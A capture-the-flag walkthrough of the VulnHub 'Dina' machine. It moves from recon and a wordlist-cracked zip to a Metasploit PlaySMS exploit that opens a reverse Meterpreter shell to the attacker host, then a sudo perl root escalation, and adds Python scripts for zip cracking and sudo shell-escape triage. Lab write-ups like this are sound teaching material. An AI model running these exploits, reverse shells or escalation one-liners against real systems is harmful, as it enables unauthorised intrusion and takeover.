We start off with an nmap scan against the remote host.
root@ubuntu:~/Downloads# nmap -sC -sV -O -T5 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-14 19:44 MST
Nmap scan report for vtcsec (192.168.56.101)
Host is up (0.00043s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
root@ubuntu:~/Downloads#
Nmap came back with only port 80 open, and the site's robots.txt gives us some directories to browse.
User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads
Most of the directories are empty, but /nothing/ returns what looks like a 404 error page. Viewing the page source reveals a hint.
view-source:http://192.168.56.101/nothing/
#my secret pass
freedom
password
helloworld!
diana
iloveroot
That gives us a list of passwords to try later. Next we run Nikto against the host to see whether it finds anything of interest.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2019-11-14 19:49:10 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 07:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8761 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2019-11-14 19:49:26 (GMT-7) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#
Nikto turned up an interesting directory, /secure/. Since directory indexing is enabled, browsing to it shows an archive, backup.zip.
http://192.168.56.101/secure/
Downloading the archive and trying to open it shows that it is password protected. We already have a list of candidate passwords, so we try each of them against the archive; 'freedom', the second entry in the list, opens it. We extract the contained file, backup-cred.mp3, and take a closer look at it.
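As an added example (not part of the original write-up), here is the wordlist attack against the archive in Python. Python's zipfile module can read ZipCrypto (traditional PKWARE) archives but cannot write them, so the block includes a minimal ZipCrypto encryptor and builds a constructed stand-in for backup.zip in memory; the real archive is not on the page. The wordlist is the one recovered from /nothing/.

```python
"""Wordlist attack on a ZipCrypto (traditional PKWARE) encrypted archive.

Added example, not from the original write-up. Python's zipfile can read
ZipCrypto archives but cannot write them, so a minimal encryptor is included
to build a stand-in for backup.zip in memory (the real archive is not on the
page); crack_zip() then tries each candidate from the /nothing/ list.
"""
import io
import struct
import zipfile
import zlib

# Candidate passwords, exactly as recovered from the source of /nothing/.
WORDLIST = ["#my secret pass", "freedom", "password", "helloworld!", "diana", "iloveroot"]


def _gen_crc(c):
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    return c


_CRCTAB = [_gen_crc(i) for i in range(256)]


class ZipCrypto:
    """Traditional PKWARE stream cipher (same key schedule zipfile uses to decrypt)."""

    def __init__(self, password):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b):
        self.k0 = (self.k0 >> 8) ^ _CRCTAB[(self.k0 ^ b) & 0xFF]
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ _CRCTAB[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def encrypt(self, data):
        out = bytearray()
        for b in data:
            k = self.k2 | 2
            out.append(b ^ (((k * (k ^ 1)) >> 8) & 0xFF))
            self._update(b)  # the keys advance on the plaintext byte
        return bytes(out)


def build_encrypted_zip(name, plain, password):
    """Return a one-entry, stored, ZipCrypto-protected archive as bytes."""
    crc = zlib.crc32(plain) & 0xFFFFFFFF
    # 12-byte encryption header. Real writers randomise the first 11 bytes;
    # byte 12 is the high byte of the CRC, the cheap check an unzipper
    # performs before trusting a password.
    header = b"\x00" * 11 + bytes([(crc >> 24) & 0xFF])
    body = ZipCrypto(password).encrypt(header + plain)
    flags, method, mtime, mdate = 0x0001, 0, 0, 0x0021  # encrypted, stored, 1980-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, mtime, mdate,
                        crc, len(body), len(plain), len(name), 0) + name
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, mtime,
                          mdate, crc, len(body), len(plain), len(name), 0, 0, 0, 0, 0, 0) + name
    end = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central),
                      len(local) + len(body), 0)
    return local + body + central + end


def crack_zip(zip_bytes, wordlist):
    """Try each candidate; return (password, plaintext) or (None, None)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        target = zf.namelist()[0]
        for candidate in wordlist:
            try:
                return candidate, zf.read(target, pwd=candidate.encode())
            except (RuntimeError, zipfile.BadZipFile):
                # RuntimeError: check byte mismatch (255 of 256 wrong guesses);
                # BadZipFile: check byte matched by chance but the CRC did not.
                continue
    return None, None


if __name__ == "__main__":
    # Constructed stand-in for backup.zip, protected with the real answer.
    sample = build_encrypted_zip(b"backup-cred.mp3", b"uname: touhid\n", b"freedom")
    print(crack_zip(sample, WORDLIST))
```

On a real engagement you would not hand-roll this: fcrackzip -u -D -p wordlist.txt backup.zip, or zip2john backup.zip > backup.hash followed by john --wordlist=wordlist.txt backup.hash, does the same job. The point the code makes is why a six-word list is enough here: ZipCrypto rejects a wrong password after decrypting 12 bytes, so every guess is essentially free, and the password strength is the only protection the archive has.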
root@ubuntu:~/Downloads# file backup-cred.mp3
backup-cred.mp3: ASCII text
root@ubuntu:~/Downloads#
root@ubuntu:~/Downloads# strings backup-cred.mp3
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin
root@ubuntu:~/Downloads#
The "mp3" is not an mp3 at all: file identifies it as ASCII text. Running strings on it gives us a message with a username, a masked password, and a URL to visit.
http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login
This is a PlaySMS login page. We try the username touhid with each of the passwords from the list.
username: touhid
#my secret pass
freedom
password
helloworld!
diana
iloveroot
http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_welcome
The login succeeds with touhid / diana and lands us on the PlaySMS welcome page. Next we search for exploits against PlaySMS.
root@ubuntu:~/src/exploitdb# ./searchsploit playsms
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Exploit Title | Path
| (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit) | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit) | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery | exploits/php/webapps/30177.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb#
We have a few choices, but there is a Metasploit module for the authenticated sendfromfile.php filename injection, which we will use to get code execution and then a shell. Let's fire up Metasploit and try it out.
msf5 > search playsms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
1 exploit/multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 exploit(multi/http/playsms_filename_exec) > show info
Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
Module: exploit/multi/http/playsms_filename_exec
Platform: PHP
Arch: php
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2017-05-21
Provided by:
Touhid M.Shaikh
DarkS3curity
Available targets:
Id Name
-- ----
0 PlaySMS 1.4
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base playsms directory path
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a code injection vulnerability within an
authenticated file upload feature in PlaySMS v1.4. This issue is
caused by improper file name handling in sendfromfile.php file.
Authenticated Users can upload a file and rename the file with a
malicious payload. This module was tested against PlaySMS 1.4 on
VulnHub's Dina 1.0 machine and Windows 7.
References:
https://www.exploit-db.com/exploits/42003
https://cvedetails.com/cve/CVE-2017-9080/
https://www.youtube.com/watch?v=MuYoImvfpew
http://touhidshaikh.com/blog/?p=336
msf5 exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
USERNAME => touhid
msf5 exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
PASSWORD => diana
msf5 exploit(multi/http/playsms_filename_exec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/playsms_filename_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin
TARGETURI => /SecreTSMSgatwayLogin
msf5 exploit(multi/http/playsms_filename_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:40206) at 2019-11-16 13:19:18 -0700
meterpreter > shell
Process 3741 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The module gives us a Meterpreter session running as www-data. After dropping to a shell and upgrading it to a pty with python, we enumerate the system to find a way to elevate our privileges.
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudoedit
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/arping
/usr/bin/X
/usr/bin/chfn
/usr/sbin/pppd
/usr/sbin/uuidd
/bin/ping6
/bin/umount
/bin/mount
/bin/ping
/bin/su
/bin/fusermount
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The search for SUID binaries shows only the usual distribution set, nothing obviously exploitable, so let's try sudo -l.
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
sudo -l
Matching Defaults entries for www-data on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on this host:
(ALL) NOPASSWD: /usr/bin/perl
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The user www-data can run /usr/bin/perl through sudo as any user without a password. A one-liner that has perl exec() an interactive shell breaks us out to root:
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo perl -e 'exec("/bin/sh -i");'
sudo perl -e 'exec("/bin/sh -i");'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
#
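The same triage can be automated. As an added example (not part of the original write-up), the following Python parses sudo -l output and flags entries whose binary is a known shell escape, noting whether a password is needed and whether the arguments are pinned in sudoers. The sample input reproduces the Dina output plus one constructed extra entry with pinned arguments; the escape hints are the ones commonly documented for these binaries.

```python
"""Triage 'sudo -l' output for entries that hand back a shell.

Added example, not part of the original write-up. It parses the block after
"User X may run the following commands" and flags binaries that are known to
spawn a shell when run under sudo, noting whether a password is required and
whether the arguments are pinned. The sample input reproduces the Dina output
plus one constructed extra entry.
"""
import os
import re

# Interpreters, editors and pagers with a well-known sudo shell escape.
SHELL_CAPABLE = {
    "perl": "sudo perl -e 'exec \"/bin/sh\";'",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "ruby": "sudo ruby -e 'exec \"/bin/sh\"'",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   (then type !/bin/sh)",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "env": "sudo env /bin/sh",
    "bash": "sudo bash",
    "sh": "sudo sh",
}

# "(runas) TAG: TAG: /path/cmd args, /path/cmd2" is the sudoers entry form.
SUDO_ENTRY = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*?)\s*$")


def parse_sudo_l(text):
    """Return (runas, tags, command) for every entry in 'sudo -l' output."""
    entries = []
    in_cmds = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True  # everything before this line is Defaults noise
            continue
        m = SUDO_ENTRY.match(line) if in_cmds else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            entries.append((m.group("runas").strip(), tags, cmd.strip()))
    return entries


def find_escapes(text):
    """Return a finding dict for every entry that can become a root shell."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        if cmd == "ALL":
            findings.append({"binary": "ALL", "runas": runas, "nopasswd": "NOPASSWD" in tags,
                             "args_pinned": False, "hint": "sudo /bin/sh"})
            continue
        argv = cmd.split()
        binary = os.path.basename(argv[0])
        if binary not in SHELL_CAPABLE:
            continue
        # Arguments fixed in sudoers (and no wildcard) block the generic escape.
        pinned = len(argv) > 1 and not any("*" in a for a in argv[1:])
        findings.append({"binary": binary, "runas": runas, "nopasswd": "NOPASSWD" in tags,
                         "args_pinned": pinned, "hint": SHELL_CAPABLE[binary]})
    return findings


# Constructed sample: the Dina entry plus one extra line with pinned arguments.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/python /opt/backup.py
"""

if __name__ == "__main__":
    for finding in find_escapes(SAMPLE_SUDO_L):
        print(finding)
```

The distinction the code draws is the one that matters when you read sudoers: an interpreter with free arguments and NOPASSWD (the Dina entry) is an immediate root shell, while the same interpreter with its arguments pinned to a script only helps if that script or its directory is writable.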
Now that we have root, all that is left is to cat flag.txt in /root.
# cd /root
cd /root
# ls -la
ls -la
total 52
drwx------ 6 root root 4096 Oct 17 2017 .
drwxr-xr-x 23 root root 4096 Oct 17 2017 ..
-rw------- 1 root root 2466 Oct 17 2017 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwxr-xr-x 3 root root 4096 Oct 17 2017 .cache
drwxr-xr-x 3 root root 4096 Oct 17 2017 .config
drwxr-xr-x 3 root root 4096 Oct 17 2017 .local
-rw------- 1 root root 55 Oct 17 2017 .mysql_history
-rw------- 1 root root 9 Oct 17 2017 .nano_history
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwx------ 2 root root 4096 Nov 15 08:13 .pulse
-rw------- 1 root root 256 Oct 17 2017 .pulse-cookie
-rw-r--r-- 1 root root 639 Oct 17 2017 flag.txt
# cat flag.txt
cat flag.txt
________ _________
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))
root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....
CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6
#